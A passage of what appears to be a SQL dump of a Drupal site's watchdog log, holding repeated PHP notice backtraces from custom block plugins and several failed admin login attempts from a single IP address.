/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\NewsBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#43 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#44 {main}\";}',5,'','http://clidentcastelo.pt/user/login','http://clidentcastelo.pt/user/login','5.188.62.25',1580445891),(4609,0,'user','Login attempt failed for %user.',_binary 'a:1:{s:5:\"%user\";s:5:\"admin\";}',5,'','http://clidentcastelo.pt/user/login','http://clidentcastelo.pt/user/login','5.188.62.25',1580447071),(4610,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:50:\"Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\";s:5:\"%file\";s:97:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:7980:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 /var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#43 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#44 {main}\";}',5,'','http://clidentcastelo.pt/user/login','http://clidentcastelo.pt/user/login','5.188.62.25',1580447071),(4611,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:46:\"Drupal\\support\\Plugin\\Block\\NewsBlock->build()\";s:5:\"%file\";s:93:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:7972:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 /var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/NewsBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\NewsBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(357): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#9 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(216): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->block_footer(Array, Array)\n#10 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_page.html.twig_UlrsFNKuJCnPy7qUT9uMgPnBG/AKdHN00D2rExV4gVnoqYtyzHoo3KnjlNxmL_ggHhDRU.php(98): Twig\\Template->displayBlock(\'footer\', Array, Array)\n#11 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_30b4e0a599f9209cfb6fe4fa126868c84e5e4b4e2c409ff4dff2f0a2cd7208fb->doDisplay(Array, Array)\n#12 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#13 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#14 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#15 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#16 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'page\', Array)\n#17 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#18 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#19 /var/www/html/clidentcastelo_stg/public/sites/default/files/php/twig/5e15b5d5663b8_html.html.twig_cjUHFHRJkpWCXgLoPgc5zGUoc/c49o6mnFasdsRxPH5Y6XYvTtxG38ptuI50UyROKfTlk.php(102): Drupal\\Core\\Template\\TwigExtension->escapeFilter(Object(Drupal\\Core\\Template\\TwigEnvironment), Array, \'html\', NULL, true)\n#20 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(455): __TwigTemplate_9650c7423b11bd4e2baf76031247c420951f1e9778d2e3424fee15124d6da689->doDisplay(Array, Array)\n#21 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(422): Twig\\Template->displayWithErrorHandling(Array, Array)\n#22 /var/www/html/clidentcastelo_stg/public/vendor/twig/twig/src/Template.php(434): Twig\\Template->display(Array)\n#23 /var/www/html/clidentcastelo_stg/public/core/themes/engines/twig/twig.engine(64): Twig\\Template->render(Array)\n#24 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Theme/ThemeManager.php(384): twig_render_template(\'themes/clidentc...\', Array)\n#25 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(437): Drupal\\Core\\Theme\\ThemeManager->render(\'html\', Array)\n#26 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#27 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(147): Drupal\\Core\\Render\\Renderer->render(Array)\n#28 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(582): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->Drupal\\Core\\Render\\MainContent\\{closure}()\n#29 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/MainContent/HtmlRenderer.php(148): Drupal\\Core\\Render\\Renderer->executeInRenderContext(Object(Drupal\\Core\\Render\\RenderContext), Object(Closure))\n#30 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/EventSubscriber/MainContentViewSubscriber.php(90): Drupal\\Core\\Render\\MainContent\\HtmlRenderer->renderResponse(Array, Object(Symfony\\Component\\HttpFoundation\\Request), Object(Drupal\\Core\\Routing\\CurrentRouteMatch))\n#31 [internal function]: Drupal\\Core\\EventSubscriber\\MainContentViewSubscriber->onViewRenderArray(Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#32 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Component/EventDispatcher/ContainerAwareEventDispatcher.php(111): call_user_func(Array, Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent), \'kernel.view\', Object(Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher))\n#33 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(156): Drupal\\Component\\EventDispatcher\\ContainerAwareEventDispatcher->dispatch(\'kernel.view\', Object(Symfony\\Component\\HttpKernel\\Event\\GetResponseForControllerResultEvent))\n#34 /var/www/html/clidentcastelo_stg/public/vendor/symfony/http-kernel/HttpKernel.php(68): Symfony\\Component\\HttpKernel\\HttpKernel->handleRaw(Object(Symfony\\Component\\HttpFoundation\\Request), 1)\n#35 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/Session.php(57): Symfony\\Component\\HttpKernel\\HttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#36 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/KernelPreHandle.php(47): Drupal\\Core\\StackMiddleware\\Session->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#37 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(106): Drupal\\Core\\StackMiddleware\\KernelPreHandle->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#38 /var/www/html/clidentcastelo_stg/public/core/modules/page_cache/src/StackMiddleware/PageCache.php(85): Drupal\\page_cache\\StackMiddleware\\PageCache->pass(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#39 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/ReverseProxyMiddleware.php(47): Drupal\\page_cache\\StackMiddleware\\PageCache->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#40 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/StackMiddleware/NegotiationMiddleware.php(52): Drupal\\Core\\StackMiddleware\\ReverseProxyMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#41 /var/www/html/clidentcastelo_stg/public/vendor/stack/builder/src/Stack/StackedHttpKernel.php(23): Drupal\\Core\\StackMiddleware\\NegotiationMiddleware->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#42 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/DrupalKernel.php(693): Stack\\StackedHttpKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request), 1, true)\n#43 /var/www/html/clidentcastelo_stg/public/index.php(20): Drupal\\Core\\DrupalKernel->handle(Object(Symfony\\Component\\HttpFoundation\\Request))\n#44 {main}\";}',5,'','http://clidentcastelo.pt/user/login','http://clidentcastelo.pt/user/login','5.188.62.25',1580447071),(4612,0,'user','Login attempt failed for %user.',_binary 'a:1:{s:5:\"%user\";s:5:\"admin\";}',5,'','http://clidentcastelo.pt/user/login','http://clidentcastelo.pt/user/login','5.188.62.25',1580448343),(4613,0,'php','%type: @message in %function (line %line of %file) @backtrace_string.',_binary 'a:6:{s:5:\"%type\";s:6:\"Notice\";s:8:\"@message\";O:25:\"Drupal\\Core\\Render\\Markup\":1:{s:9:\"\0*\0string\";s:44:\"Only variables should be passed by reference\";}s:9:\"%function\";s:50:\"Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\";s:5:\"%file\";s:97:\"/var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php\";s:5:\"%line\";i:21;s:17:\"@backtrace_string\";s:7980:\"#0 /var/www/html/clidentcastelo_stg/public/core/includes/bootstrap.inc(587): _drupal_error_handler_real(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#1 /var/www/html/clidentcastelo_stg/public/modules/custom/support/src/Plugin/Block/ServicesBlock.php(21): _drupal_error_handler(8, \'Only variables ...\', \'/var/www/html/c...\', 21, Array)\n#2 /var/www/html/clidentcastelo_stg/public/core/modules/block/src/BlockViewBuilder.php(163): Drupal\\support\\Plugin\\Block\\ServicesBlock->build()\n#3 [internal function]: Drupal\\block\\BlockViewBuilder::preRender(Array)\n#4 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(378): call_user_func(\'Drupal\\\\block\\\\Bl...\', Array)\n#5 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(450): Drupal\\Core\\Render\\Renderer->doRender(Array)\n#6 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Render/Renderer.php(195): Drupal\\Core\\Render\\Renderer->doRender(Array, false)\n#7 /var/www/html/clidentcastelo_stg/public/core/lib/Drupal/Core/Template/TwigExtension.php(501): Drupal\\Core\\Render\\Renderer->render(Array)\n#8 